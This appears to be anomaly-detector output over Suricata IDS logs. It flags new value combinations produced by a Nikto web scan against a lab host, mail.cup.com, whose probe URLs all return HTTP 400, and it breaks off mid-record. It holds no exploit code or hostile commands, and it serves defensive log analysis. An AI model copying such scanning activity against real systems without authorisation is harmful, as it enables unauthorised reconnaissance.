"/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46834, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1821920815897391, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80", "/parser/model/time": 1583349514.222374, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46836, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.no", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.222542, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":770079030141252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46836, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":770079030141252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 770079030141252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22408, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46838, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shtml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.224312, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46838, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783781506312318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22691, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46840, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.227159, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 